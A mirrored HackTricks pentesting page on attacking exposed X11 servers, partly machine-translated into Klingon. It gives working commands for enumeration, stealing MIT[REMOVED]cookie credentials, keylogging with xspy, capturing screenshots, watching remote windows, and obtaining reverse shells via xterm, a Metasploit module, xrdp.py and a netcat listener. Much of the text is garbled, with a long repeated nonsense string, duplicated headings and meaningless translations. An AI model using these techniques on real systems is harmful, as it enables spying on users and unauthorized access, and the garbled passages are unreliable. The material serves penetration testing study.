Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/6000-pentesting-x11.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

18 KiB
Raw Permalink Blame History

6000 - Pentesting X11

htARTE (HackTricks AWS Red Team Expert) !HackTricks AWS Red Team Expert!

Other ways to support HackTricks:

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

Basic Information

X Window System (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical user interfaces (GUIs), with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment.

Default port: 6000

PORT       STATE   SERVICE
6000/tcp   open    X11

Enumeration

QaD jImej: anonymous connection laH.

nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11

Local Enumeration

The file .Xauthority in the users home folder is used by X11 for authorization. From here:

qo'noS Enumeration

.Xauthority file users home folder used by X11 for authorization. here vItlhutlh.

$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d  ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d  IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58  1...R.~..A.....X
00000030: 041d ef                                  ...

MIT-magic-cookie-1: Generating 128bit of key ("cookie"), storing it in ~/.Xauthority (or where XAUTHORITY envvar points to). The client sends it to server plain! the server checks whether it has a copy of this "cookie" and if so, the connection is permitted. the key is generated by DMX.

{% hint style="warning" %} In order to use the cookie you should set the env var: export XAUTHORITY=/path/to/.Xauthority {% endhint %}

Local Enumeration Session

MIT-magic-cookie-1: 128bit vItlhutlh ("cookie") jatlh ~/.Xauthority (be'nal XAUTHORITY envvar points to). ghItlhDI' client vItlhutlh server plain! server vItlhutlh "cookie" copy 'ej vaj vItlhutlh, 'ach, connection permitted. key DMX generated.

{% hint style="warning" %} vItlhutlh use the cookie 'oH: export XAUTHORITY=/path/to/.Xauthority {% endhint %}

Local Enumeration Session

$ w
23:50:48 up 1 day, 10:32,  1 user,  load average: 0.29, 6.48, 7.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
user     tty7     :0               13Oct23 76days 13:37   2.20s xfce4-session

Verfy Connection

QaD jImej

In the example, localhost:0 was running xfce4-session.

xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0

Keyloggin

xspy to sniff the keyboard keystrokes.

Sample Output:

xspy 10.9.xx.xx

opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab

Screenshots capturing

tlhIngan Hol translation:

Screenshots capturing

tlhIngan Hol translation:

Screenshots capturing

xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png

Remote Desktop View

Way from: https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref

./xrdp.py <IP:0>

QaQ: https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html

cha'logh: xwininfo rurID'e' vItlhutlh.

xwininfo -root -display 10.9.xx.xx:0

xwininfo: Window id: 0x45 (the root window) (has no name)

Absolute upper-left X:  0
Absolute upper-left Y:  0
Relative upper-left X:  0
Relative upper-left Y:  0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners:  +0+0  -0+0  -0-0  +0-0
-geometry 1024x768+0+0

XWatchwin

Qapvam nIvbogh vIlo'laH chu' vaj jatlh vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' 'e' vaj 'oH vay' **'e'

./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45

QapwI'pu' Shell

Introduction

In this section, we will discuss various techniques to obtain a shell on a target system through X11 vulnerabilities. X11 is a network protocol used for graphical user interfaces (GUI) in Unix-like operating systems.

X11 Forwarding

X11 forwarding is a feature that allows the display of a graphical application running on a remote machine to be shown on a local machine. This feature can be exploited to gain access to the target system.

To enable X11 forwarding, use the -X or -Y option when connecting to the target system via SSH:

ssh -X user@target_ip

Once connected, you can run graphical applications on the target system, and the display will be forwarded to your local machine.

X11 Server-Side Attack

In some cases, the target system may have an X11 server running with weak or no access control. This can be exploited to execute arbitrary commands on the target system.

To check if the target system has an X11 server running, use the xhost command:

xhost

If the output shows any access control disabled (+ symbol), it means that the X11 server is vulnerable.

To exploit this vulnerability, set the DISPLAY environment variable to the attacker's IP address and execute the desired command:

export DISPLAY=attacker_ip:0
xterm

This will open an X11 terminal on the attacker's machine, with the display forwarded from the target system. From here, you can execute commands as if you were on the target system.

X11 Client-Side Attack

In some cases, the target system may have an X11 client running with weak or no access control. This can be exploited to execute arbitrary commands on the target system.

To exploit this vulnerability, set the DISPLAY environment variable to the attacker's IP address and execute the desired command:

export DISPLAY=attacker_ip:0
xterm -display target_ip:0

This will open an X11 terminal on the attacker's machine, with the display forwarded from the target system. From here, you can execute commands as if you were on the target system.

Conclusion

Obtaining a shell through X11 vulnerabilities can provide an attacker with significant control over a target system. It is important to be aware of these vulnerabilities and take appropriate measures to secure X11 servers and clients.

msf> use exploit/unix/x11/x11_keyboard_exec

Qa'vIn Qa'leS: Xrdp jatlhpu' netcatDaq qaStaHvIS reverse shell laH. vItlhutlh 'ej vItlhutlh command:

./xrdp.py \<IP:0> no-disp

In the interface you can see the R-shell option.

Then, start a Netcat listener in your local system on port 5555.

nc -lvp 5555

ngoQ, R-Shell vItlhutlh IP address je port vaj click R-shell vIlegh shell.

References

Shodan

  • port:6000 x11

HackenProof Discord server vItlhutlh experienced hackers je bug bounty hunters vItlhutlh!

Hacking Insights
Hacking vItlhutlh thrill je challenges vItlhutlh content vItlhutlh engage.

Real-Time Hack News
Real-time news je insights vItlhutlh hacking vItlhutlh fast-paced world vItlhutlh keep up-to-date.

Latest Announcements
Newest bug bounties launching je crucial platform updates vItlhutlh stay informed.

Join us on Discord je top hackers vItlhutlh collaborate vItlhutlh start today!

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: